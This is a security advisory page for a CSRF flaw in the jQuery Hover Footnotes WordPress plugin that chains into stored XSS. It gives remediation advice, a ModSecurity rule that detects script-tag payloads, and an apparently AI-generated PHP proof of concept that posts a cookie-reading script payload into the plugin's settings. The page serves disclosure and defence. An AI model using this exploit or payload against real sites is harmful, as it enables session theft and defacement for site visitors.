What is CVE-2026-10553?

CVE-2026-10553 is a Cross-Site Request Forgery (CSRF) vulnerability in the jQuery Hover Footnotes plugin for WordPress. It allows unauthenticated attackers to update plugin settings without proper validation, which can lead to stored Cross-Site Scripting (XSS) attacks.

How does the vulnerability work?

The vulnerability exists due to missing nonce validation in the jqFootnotes_options_subpanel function. An attacker can trick a logged-in administrator into submitting a forged request that updates plugin settings, allowing malicious scripts to be stored and executed on the frontend.

Who is affected by this vulnerability?

All WordPress sites using the jQuery Hover Footnotes plugin version 1.4 or earlier are affected. Site administrators should check their plugin version to determine if they are at risk.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the jQuery Hover Footnotes plugin installed on your WordPress site. If it is version 1.4 or earlier, your site is susceptible to this vulnerability.

What is the CVSS score for this vulnerability?

The CVSS score for CVE-2026-10553 is 4.3, which is classified as Medium severity. However, the practical impact may be higher due to the potential for stored XSS, which can affect all site visitors.

How can I mitigate this vulnerability?

To mitigate this vulnerability, it is recommended to disable the jQuery Hover Footnotes plugin until a patched version is available. Additionally, ensure that nonce validation is implemented in the plugin settings to prevent CSRF attacks.

What does the risk level mean in practical terms?

A CVSS score of 4.3 indicates a medium risk, meaning that while the vulnerability requires social engineering to exploit, the potential for stored XSS poses a significant threat to site visitors and the overall security of the site.

What is the proof of concept for this vulnerability?

The proof of concept demonstrates how an attacker can craft a malicious request to the vulnerable endpoint, altering plugin settings to inject JavaScript. This script can then be executed on the frontend, affecting all users who visit the site.

What should I do if I cannot disable the plugin?

If disabling the plugin is not an option, consider implementing additional security measures such as web application firewalls or monitoring for unusual activity. However, the best course of action is to disable the plugin until a fix is released.

Is there a patch available for this vulnerability?

As of now, there is no patched version of the jQuery Hover Footnotes plugin available. Site administrators should monitor the plugin’s repository for updates and apply the patch as soon as it is released.

What are the potential consequences of exploitation?

Successful exploitation of this vulnerability could lead to stored XSS, allowing attackers to execute arbitrary JavaScript on the site. This could result in session hijacking, redirection to malicious sites, or defacement of the website.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : June 9, 2026

CVE-2026-10553: jQuery Hover Footnotes <= 1.4 Cross-Site Request Forgery to Plugin Settings Update PoC, Patch Analysis & Rule

CVE ID CVE-2026-10553

Plugin jquery-hover-footnotes

Severity Medium (CVSS 4.3)

CWE 352

Vulnerable Version 1.4

Patched Version —

Disclosed June 7, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-10553 (metadata-based):

This is a Cross-Site Request Forgery vulnerability in the jQuery Hover Footnotes plugin for WordPress, affecting all versions up to and including 1.4. The vulnerability exists in the jqFootnotes_options_subpanel function, which lacks nonce validation. An unauthenticated attacker can trick a site administrator into performing an action (e.g., clicking a link) that forges a request to update plugin settings. Because the plugin stores option values (jqfoot_anchor_open, jqfoot_anchor_close, jqfoot_title) without sanitization and then outputs them unescaped into frontend page content, the CSRF can be chained into persistent Cross-Site Scripting. The CVSS score is 4.3 (Medium), but the actual impact is higher due to the XSS chain.

The root cause is the absence of nonce validation on the jqFootnotes_options_subpanel function. In WordPress admin pages, nonces provide CSRF protection by verifying that a request originated from the legitimate admin interface. Without a nonce check, an attacker can craft a request that appears to come from an authenticated admin. The vulnerability description explicitly states “missing or incorrect nonce validation.” Atomic Edge analysis confirms this is a classic CSRF pattern in WordPress plugins where settings are updated via a function hooked into an admin page or AJAX handler. The option values are then persisted with update_option() without sanitization and echoed unescaped on the frontend, enabling stored XSS.

Exploitation requires social engineering. An attacker must trick a logged-in administrator into submitting a forged request. The likely request is a POST to /wp-admin/options-general.php?page=jqFootnotes or a similar admin page URL where the plugin settings are processed. The attacker would craft a form or a link that, when submitted, sends parameters such as jqfoot_anchor_open=alert(‘XSS’) to the vulnerable endpoint. Because the function lacks a nonce check, the request is processed as if it were legitimate. The malicious script payload is stored in the WordPress options table and then rendered on every page where footnotes appear, affecting all site visitors.

Remediation requires adding a nonce check to the jqFootnotes_options_subpanel function. A WordPress nonce should be generated during the settings page form and validated on submission using check_admin_referer() or wp_verify_nonce(). Additionally, the plugin should sanitize option values before saving them and escape them before output. Using sanitize_text_field() or similar on input, and esc_html() or wp_kses() on output, would prevent the XSS chain. Since no patched version is available, site administrators should disable the plugin until a fix is released.

The impact is significant. While the CSRF alone requires an admin to be tricked, the chained stored XSS affects all site visitors and can be used to inject arbitrary JavaScript. An attacker could steal session cookies, redirect users to malicious sites, deface pages, or perform actions on behalf of authenticated users. The CVSS vector shows LOW integrity impact and no confidentiality or availability impact, but Atomic Edge analysis considers the XSS chain to elevate the risk to a higher severity level in practice.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2026-10553 (metadata-based)
# Block CSRF attempts to the vulnerable plugin settings endpoint without nonce
# This rule matches POST requests to the known admin page with XSS payloads in option values
SecRule REQUEST_URI "@beginsWith /wp-admin/options-general.php" 
  "id:20261055,phase:2,deny,status:403,chain,msg:'CVE-2026-10553 - jQuery Hover Footnotes CSRF to XSS',severity:'CRITICAL',tag:'CVE-2026-10553'"
  SecRule ARGS_GET:page "@streq jqFootnotes" "chain"
    SecRule REQUEST_METHOD "@streq POST" "chain"
      SecRule ARGS_POST:jqfoot_anchor_open "@rx <[^>]*script|<[^>]*onload|<[^>]*onerror" 
        "t:urlDecode,t:lowercase"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-10553 - jQuery Hover Footnotes <= 1.4 - CSRF to Plugin Settings Update

// This PoC demonstrates a CSRF attack that changes plugin options to inject JavaScript.
// It assumes the vulnerable endpoint is /wp-admin/options-general.php?page=jqFootnotes
// which processes the POST request without nonce validation.

// Configuration
$target_url = 'http://example.com/wp-admin/options-general.php?page=jqFootnotes'; // Change to target WordPress admin URL

// Attacker-controlled malicious payload for stored XSS
$malicious_anchor_open = '"><script>alert(document.cookie)</script>';
// The payload will be stored in the jqfoot_anchor_open option and output unescaped.

// Build the POST data for the CSRF exploit
$post_data = array(
    'jqfoot_anchor_open' => $malicious_anchor_open,
    'jqfoot_anchor_close' => '',
    'jqfoot_title' => '',
    // Additional parameters may be required; these are based on the description.
    'submit' => 'Save Changes'
);

// Initialize cURL session
$ch = curl_init();

// Set cURL options
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_COOKIE, ''); // In real attack, the admin's session cookie would be sent via browser

// Execute the request
$response = curl_exec($ch);

// Check for errors
if(curl_error($ch)) {
    echo 'cURL Error: ' . curl_error($ch);
} else {
    echo 'CSRF request sent successfully. The plugin settings have been updated with the XSS payload.';
    echo 'nWhen an admin visits any page with footnotes, the injected script will execute.';
}

// Close cURL session
curl_close($ch);
?>

Frequently Asked Questions

What is CVE-2026-10553?
Understanding the vulnerability
CVE-2026-10553 is a Cross-Site Request Forgery (CSRF) vulnerability in the jQuery Hover Footnotes plugin for WordPress. It allows unauthenticated attackers to update plugin settings without proper validation, which can lead to stored Cross-Site Scripting (XSS) attacks.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability exists due to missing nonce validation in the jqFootnotes_options_subpanel function. An attacker can trick a logged-in administrator into submitting a forged request that updates plugin settings, allowing malicious scripts to be stored and executed on the frontend.
Who is affected by this vulnerability?
Identifying vulnerable users
All WordPress sites using the jQuery Hover Footnotes plugin version 1.4 or earlier are affected. Site administrators should check their plugin version to determine if they are at risk.
How can I check if my site is vulnerable?
Steps for verification
To check if your site is vulnerable, verify the version of the jQuery Hover Footnotes plugin installed on your WordPress site. If it is version 1.4 or earlier, your site is susceptible to this vulnerability.
What is the CVSS score for this vulnerability?
Understanding severity ratings
The CVSS score for CVE-2026-10553 is 4.3, which is classified as Medium severity. However, the practical impact may be higher due to the potential for stored XSS, which can affect all site visitors.
How can I mitigate this vulnerability?
Recommended actions
To mitigate this vulnerability, it is recommended to disable the jQuery Hover Footnotes plugin until a patched version is available. Additionally, ensure that nonce validation is implemented in the plugin settings to prevent CSRF attacks.
What does the risk level mean in practical terms?
Interpreting the CVSS score
A CVSS score of 4.3 indicates a medium risk, meaning that while the vulnerability requires social engineering to exploit, the potential for stored XSS poses a significant threat to site visitors and the overall security of the site.
What is the proof of concept for this vulnerability?
Demonstrating the exploit
The proof of concept demonstrates how an attacker can craft a malicious request to the vulnerable endpoint, altering plugin settings to inject JavaScript. This script can then be executed on the frontend, affecting all users who visit the site.
What should I do if I cannot disable the plugin?
Alternative measures
If disabling the plugin is not an option, consider implementing additional security measures such as web application firewalls or monitoring for unusual activity. However, the best course of action is to disable the plugin until a fix is released.
Is there a patch available for this vulnerability?
Current status of remediation
As of now, there is no patched version of the jQuery Hover Footnotes plugin available. Site administrators should monitor the plugin’s repository for updates and apply the patch as soon as it is released.
What are the potential consequences of exploitation?
Impact of successful attacks
Successful exploitation of this vulnerability could lead to stored XSS, allowing attackers to execute arbitrary JavaScript on the site. This could result in session hijacking, redirection to malicious sites, or defacement of the website.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations